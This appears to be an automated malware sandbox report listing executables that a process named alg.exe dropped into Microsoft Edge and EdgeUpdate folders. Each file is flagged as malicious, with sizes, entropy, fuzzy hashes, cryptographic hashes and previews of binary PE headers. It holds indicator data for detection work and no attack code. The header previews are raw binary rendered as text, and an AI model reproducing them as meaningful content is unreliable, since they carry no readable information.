                                                                                                                                                SHA-256:130C527591B71F9B18B182443564A989070E990532DBEDEE564758853D5DC5B9
                                                                                                                                                SHA-512:3C459206F5D00E271ECB71698EAC14D522FBB619825A89029E5891383CDF2530B8D6D71ED476BFEF1571E338E2D117132A85E50E478B7DD7F5214DA2F9F8CD18
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL.....'.L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1657344
                                                                                                                                                Entropy (8bit):5.63515526043391
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:mE8DMeflpnIOvYU4sqjnhMgeiCl7G0nehbGZpbD:mtDD9pnIOODmg27RnWGj
                                                                                                                                                MD5:48CBC829B8FD9DBC732C70D03A0946E8
                                                                                                                                                SHA1:DFD1DD048FF084E441EADA92433D950D18229B6C
                                                                                                                                                SHA-256:0B97B1DB4A6AC78D82C0ED504B3AD3CC3E27BB34564C2A35D71E217696ED0DF6
                                                                                                                                                SHA-512:F6CCD4E4D32F30A236B91201A9E7268C11482EBC6F2D91F2568BF88E77D841D599AB30B3DB50220C671F9E7C63B20733BAAE81B6B08C33881745B7A86460840F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.......................................... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4364800
                                                                                                                                                Entropy (8bit):6.748493619259159
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:qB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EdDmg27RnWGj:EHzorVmr2ZkRpdJYolrD527BWG
                                                                                                                                                MD5:6D45DA866B3E4BC0EB4CE3C16C4EB5D0
                                                                                                                                                SHA1:9FD22D0762A3809012884C3454E5CB7D2E9C6007
                                                                                                                                                SHA-256:4AC77A49484E68183E68D3809DB437C0D9695C681F845E4290AD55ADC92599DB
                                                                                                                                                SHA-512:E9D63BA340411C9C9E3431BF8DF9BC4C1D4EDBBF8B32CBB6D53982B8447BBD8F32335347207754F0DB42206902645C23FB7BE079436F1758EEE9CE57D178A0FD
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.....$.B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1238528
                                                                                                                                                Entropy (8bit):5.146949201384215
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:63w1uVdSEjKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:6EyTKsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:F3E7C2B36A563069187035C3ACC28786
                                                                                                                                                SHA1:5DA8E24A8B450FA87E4FCA7DE49C4468E6BDFF65
                                                                                                                                                SHA-256:45584328C83BD1EBA20F2C14416395B85195A3C63211EB79EF13D9FAA1D90741
                                                                                                                                                SHA-512:A87D1FF9F2601E5758CE0C61185E5A8DBEAE7202E42B793D02DE770E14E748C27CDC2B5C5313817D367A89FF00E6EAB364060C8915A216E0CB752E9E717A07D8
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P.......,.... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2354176
                                                                                                                                                Entropy (8bit):7.049994809209524
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:4hDdVrQ95RW0YEHyWQXE/09Val0GrDmg27RnWGj:4hHYW+HyWKsD527BWG
                                                                                                                                                MD5:325FCE66CB0133E663D042F034BDE5AF
                                                                                                                                                SHA1:4B1959EC5D58D90E4200332EA8F512AE32CDC35A
                                                                                                                                                SHA-256:E4213156AE8CD78C109D15A10802CC5D8B85018925E1714794B58D493DAA0811
                                                                                                                                                SHA-512:1BC3F9DD1FAE57C6C5D2199526A804867E03B0F9C9F0B28C07B770AA00B429C0EAF5B3864DB691F985EFD2440AC5C314C4986632FAC8B38E6C8D598593406FD3
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.....&*$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1825280
                                                                                                                                                Entropy (8bit):7.158505390765769
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:v70E0ZCQZMiU6Rrt9RoctGfmddJsqjnhMgeiCl7G0nehbGZpbD:D0EzQSyRPRoc1RDmg27RnWGj
                                                                                                                                                MD5:46963946E056E08693AB0C65CA548C55
                                                                                                                                                SHA1:BA2DDBEDC16AA75CB22011E8582F86CC8D90B34D
                                                                                                                                                SHA-256:094A9F6D8ED3BC775BF93EE252AE88E1A6E400FCA30BC6790DC71FAB25E577B8
                                                                                                                                                SHA-512:83001758C90EC9F362DE838BF1DAC0D94BDC7CFB2ADE9FD64058F5F8814D7C50E69902F4DF221CAB093743CB7A8E72B48320B7194FBE427CD36BD19D0F593178
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0............ ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1847808
                                                                                                                                                Entropy (8bit):7.145507204111395
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:xiD2VmA1YXwHwlklb8boUuWPg2gmsqjnhMgeiCl7G0nehbGZpbD:QD2VmAyiwIb8boQ9Dmg27RnWGj
                                                                                                                                                MD5:CEFC974E2C85DDF71D709090DC59BA5A
                                                                                                                                                SHA1:0623C9FFF6F5A0331CE35BDE627461E6E1F25FFC
                                                                                                                                                SHA-256:62C0358AB9073CBA3BD056DD4B9650964BE961FDBE570392E1391C0ABFA15512
                                                                                                                                                SHA-512:9C9B9F8A46EE1514278258BD5081F64E6A84506ECDE778001DDD0401AD69C0A8A262C9E8035F568E16285AE931ED1ADBD4632E648421AAD9E3D73E300ED37B9C
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p......;..... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2853376
                                                                                                                                                Entropy (8bit):6.9507667288300325
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:OfD3zO9ZhBGloizM3HRNr00lDmg27RnWGj:0DaalxzM00lD527BWG
                                                                                                                                                MD5:FC4653050C83F4EDBE95E15C027EAA60
                                                                                                                                                SHA1:A7072C694CDC516565FCDC6F77F63E5F65DD9363
                                                                                                                                                SHA-256:E536BC7768C8DD996A784A97F60816A0AC6A34477F1ED67B40D1481680F00C7C
                                                                                                                                                SHA-512:2A6A74BFE59B45EEC2543CC7C040A242B6E978C3B12BB9586580D61DB2F2321515681AA6196D22108FEAF50C108D0EF6478645A3983C12612F8B3FDF25FF0C2D
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.....f.,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4320256
                                                                                                                                                Entropy (8bit):6.824632926917932
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:49152:aTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhGDmg27RnN:1I72LvkrDpbxJRoIMND527BWG
                                                                                                                                                MD5:8A7CF958323148E7E580E2724C987A4C
                                                                                                                                                SHA1:E057844B0087CC66CCEE49E8940C18DE980A12B3
                                                                                                                                                SHA-256:B74DA0E046C1775662B5C9978E8589C70A60ED267C02799CD9102A0EDDBDBC9F
                                                                                                                                                SHA-512:DF7315650258FEC2FC870507974F2B07A504A525FC5E9FC656A48EA19525C7C886C7745B7AF3DA940C73B6B9408EB610C4A6612CE128755FE3E97A9D6BCD7DE6
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.......B... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2062336
                                                                                                                                                Entropy (8bit):7.097259548321264
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:BW9Jml9mmijviMnF+ZxmQWcbLw8VZsqjnhMgeiCl7G0nehbGZpbD:BWnm5iOMkjmQWkVdDmg27RnWGj
                                                                                                                                                MD5:A1107F79091FE74FA4845CD181DBDE8D
                                                                                                                                                SHA1:5AA188E99F2F4AB314C0413B9F545F2D84C25FD0
                                                                                                                                                SHA-256:BF199CAC1704F53FC88C4054354859F99C6F5E3A517EE9DBC58E67F224FA0557
                                                                                                                                                SHA-512:4146E035CCBE2CFB96F88ECDB54CE7EA23CF1CE7E7994ABDE7BDB86E17F2A965BB4E23DA596845F484222F025CF393BF0B6F3237749901159B8382F2C3BB49AB
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. .....V..... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1801216
                                                                                                                                                Entropy (8bit):7.166388926561532
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:7wNHwoYhua6MtjRO4qbBJTY6mY1uIgfsqjnhMgeiCl7G0nehbGZpbD:7wNPdQO7BJTfmEcDmg27RnWGj
                                                                                                                                                MD5:68CC0D3B2EEED8D957EE013A45A98139
                                                                                                                                                SHA1:A8B0FA3FEC595723A9E7440FE7CCE3712F71C528
                                                                                                                                                SHA-256:702726E75C0E8AC9A501DB9674B15F43286728A6D429510B2933D9E88BDC6B3B
                                                                                                                                                SHA-512:AC0160028CB405A9C48F6FEBED6C9F36A3D6BEC5B1D1C674461B954F11EBAEC5EE49EECC8C4E67E221F97BF9DEC35E3244193575D74C9F2A9B6B16397C69FD59
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................g..... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1847808
                                                                                                                                                Entropy (8bit):7.145492291823538
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:eiD2VmA1YXwHwlklb8boUuWPg2gmsqjnhMgeiCl7G0nehbGZpbD:9D2VmAyiwIb8boQ9Dmg27RnWGj
                                                                                                                                                MD5:EA452DAB7E3584DA1398E81E58B102D7
                                                                                                                                                SHA1:A0E766C320D369D0FBAB9DDD11A05F82396CD790
                                                                                                                                                SHA-256:15A6E496C85BDDEE9F753B9912D5BA488A199D66834CF1D0E695F6FE8E15AA15
                                                                                                                                                SHA-512:EC446B10653152DDCB6CBD4B8FCBB2130FFF2F8ED22E5133CC9346746212AE2A5F8FA4F1F27137969380CBEC6A640F62D646F0A39FA6476BF88E12CC8E3A4134
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......R.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1801216
                                                                                                                                                Entropy (8bit):7.166386603609311
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:lwNHwoYhua6MtjRO4qbBJTY6mY1uIgfsqjnhMgeiCl7G0nehbGZpbD:lwNPdQO7BJTfmEcDmg27RnWGj
                                                                                                                                                MD5:F722D0A5325C87DD33AE930664B1B729
                                                                                                                                                SHA1:AEC9B8A37B43B55D8D2910103272DF9D4D811108
                                                                                                                                                SHA-256:F7A864BDF6BA75542FBFAF0D6090E06E8B39755674DBC140ED6D3EA0B35ADAE1
                                                                                                                                                SHA-512:2E209D0B948BCCD42A935851CC8D348468B294510C97F2F5C1198ABF3BE8A8FDC9281BAECBC351427BB4A4D5C4ECB0379AF37A1C62004A2F7FDED9119FD48232
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................q..... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1325568
                                                                                                                                                Entropy (8bit):5.141860474054029
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:Q4lbht6BHcsqjnhMgeiCl7G0nehbGZpbD:hlNtqHIDmg27RnWGj
                                                                                                                                                MD5:9F4B7527135AC82032593D3E39FD61E7
                                                                                                                                                SHA1:6109F990A37FC5FED5CD146F465A6A2B784B741F
                                                                                                                                                SHA-256:41A26D0EBCD109A8CB9CE5EB6CBC8FFA0116A070C93BCE220E526096E7842D32
                                                                                                                                                SHA-512:ADF6AC2480B7415804684A1F1DF0DD5EAF5EDD242D5C13FADC23D981440C9B474BC9273FC632437C6796C0F5EC9E4C582C3EB7E0BDAC6225742C02C669BAD67B
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.........................................................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1221120
                                                                                                                                                Entropy (8bit):5.138870067944305
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:KIkOkTB+wgXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:KIxkTBVgsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:81018C0AAE348DD8722F47301E25381E
                                                                                                                                                SHA1:58574D65DC0848692A08D5ED843A338FDDD8EC8D
                                                                                                                                                SHA-256:166F69901C30DBCA960429FF327A61635B28A2D10C85335A4F9F433BFBA95DEE
                                                                                                                                                SHA-512:D2629615D37E3A505268E999F63AE54E005EB3B12F6DF3BA299679ECB8A15FF5C3EEE7192DEDDD3A352DFF32B5BFCDBEF5E876FD1B9B845BA6B3F9FCC6F90425
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................Yg......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1335296
                                                                                                                                                Entropy (8bit):5.236806434223795
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:X4lssmroC3Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:Xcssmr1sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:BDB25DCFD241A54A0ED3FA2597926A21
                                                                                                                                                SHA1:6A01558AF1F5E263E71A3C0E03D8B914D9BD525B
                                                                                                                                                SHA-256:BC57071217819B670575D7A0110E50EAB0B890FD0E206B56414B81E71A5F7611
                                                                                                                                                SHA-512:F0F986B28FA943354806375F3D3F52E064906F7A5A8301C49E4C473BFF5688E0E5432935449100D0CCA0CF917423713C3AC62971464374335BAB97545144460A
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.......................................... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1383936
                                                                                                                                                Entropy (8bit):5.338547821610714
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:H03cT++foSBWU2YxhkgisqjnhMgeiCl7G0nehbGZpbD:U3cK+foQWU2YnPmDmg27RnWGj
                                                                                                                                                MD5:2E99DED0AC659C4FC65BC186BA37EAD0
                                                                                                                                                SHA1:3D4CC419E1644932C2295973D7F958952A935313
                                                                                                                                                SHA-256:3FA00BDA2BB449F408A0447547036DC54357F2F316C59503D36435F860E73EDE
                                                                                                                                                SHA-512:87BF521732E40FA6B9EFB623A3A9DB84AA707112C735CE21C815E65C4A09725107A1E51A578D71D3521E0603538314B4A8E329FA07354E3B7D596031493AE3E0
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@.........................................................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\alg.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1221120
                                                                                                                                                Entropy (8bit):5.138926649475792
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:qbrNRzB+NCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:qbBRzBgCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                MD5:7A32724D43C4BEE8B171BAE859B62A8B
                                                                                                                                                SHA1:CC89FA01C2EA3F5813FF12A7618D77E1B5171E54
                                                                                                                                                SHA-256:C00C716B8DD491DB7E8D00D0BC71928F462C4873F812D808400D86B0341A0526
                                                                                                                                                SHA-512:E32137CE8BA920A2FF6D70705060A8D7BE5B1273417A4A4E15740A433D65DD52DD92224A921461D05FA0589915501B91E56DC3496280FE62AC167A15630A60F9
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.................................B ..........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

